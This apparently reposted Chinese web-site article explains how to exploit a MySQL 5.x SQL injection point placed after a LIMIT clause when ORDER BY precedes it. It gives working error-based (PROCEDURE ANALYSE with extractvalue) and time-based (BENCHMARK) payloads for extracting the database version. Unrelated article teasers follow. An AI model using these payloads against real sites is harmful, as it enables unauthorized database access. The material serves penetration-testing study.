Mysql注入点在limit关键字后面的利用方法

网站建设评论11

描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。

细节

在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】

问题的关键在于,语句中有order by 关键字,我们知道,mysql 中在order by 前面可以使用union 关键字,所以如果注入点前面没有order by 关键字,就可以顺利的使用union 关键字,但是现在的情况是,注入点前面有order by 关键字,这个问题在stackoverflow 上和sla.ckers上都有讨论,但是都没有什么有效的解决办法。

Mysql注入点在limit关键字后面的利用方法-开水网络
sql注入

我们先看看 mysql 5.x 的文档中的 select 的语法:

SELECT
[ALL | DISTINCT | DISTINCTROW ]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
select_expr [, select_expr ...]
[FROM table_references
[WHERE where_condition]
[GROUP BY {col_name | expr | position}
[ASC | DESC], ... [WITH ROLLUP]]
[HAVING where_condition]
[ORDER BY {col_name | expr | position}
[ASC | DESC], ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]
[INTO OUTFILE \'file_name\' export_options
| INTO DUMPFILE \'file_name\'
| INTO var_name [, var_name]]
[FOR UPDATE | LOCK IN SHARE MODE]]

limit 关键字后面还有 PROCEDURE 和 INTO 关键字,into 关键字可以用来写文件,但这在本文中不重要,这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)。

尝试用这个存储过程:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);

ERROR 1386 (HY000): Can\'t use ORDER clause with this procedure

ANALYSE支持两个参数,试试两个参数:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);

ERROR 1386 (HY000): Can\'t use ORDER clause with this procedure

依然无效,尝试在 ANALYSE 中插入 sql 语句:

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

响应如下:

ERROR 1108 (HY000): Incorrect parameters to procedure \'analyse’

事实证明,sleep 没有被执行,最终,我尝试了如下payload :

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: \':5.5.41-0ubuntu0.14.04.1\'

啊哈,上面的方法就是常见的报错注入,所以,如果注入点支持报错,那所有问题都ok,但是如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

有意思的是,这里不能用sleep而只能用 BENCHMARK。

 
胡远丰:企业做网站建设到底是为的什么? 网站建设

胡远丰:企业做网站建设到底是为的什么?

SEO三剑客:企业做网站建设到底是为的什么?搞精准流量,找精准客户营销专家。你好,我是SEO三剑客SEO,每天一篇文章,分享我的思维经验和方法,希望对你有所帮助。下午在网上搜索资料,找一些本地的石材厂...
11评论
网站建设

苹果OS X分布式广告木马分析

今天Dr.Web公司发布了一篇有关《苹果OS X分布式广告木马的简短分析》,虽然对该木马进行了一些分析,但是具体的细节并没有公布出来。在这里我们将为大家提供更多的信息。另外如果你想自己在家里好好的玩这...
8评论
在网站建设类型中常见的几种建站类型 网站建设

在网站建设类型中常见的几种建站类型

根据几年的网站建设经验,为网站建设类型主要归类下面几类,可以让很多人可以大概的了解网站类型大概有哪些,下面是笔者的简单描述,更详细的有待补充。  在与客户交谈或我们在专业知识角度上,网站建设主要分下面...
6评论
网站建设

能量墙与家庭电厂

去年下半年,《财新周刊》缺一个专栏作者,问我写不写。我就写了,到现在也有八、九篇文章了。大多数时候,搜索枯肠,还是写得不满意。因为从来没写过,也不知道如何在1500+字里,向大众介绍技术问题。下面这篇...
8评论
匿名

发表评论

匿名网友
:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: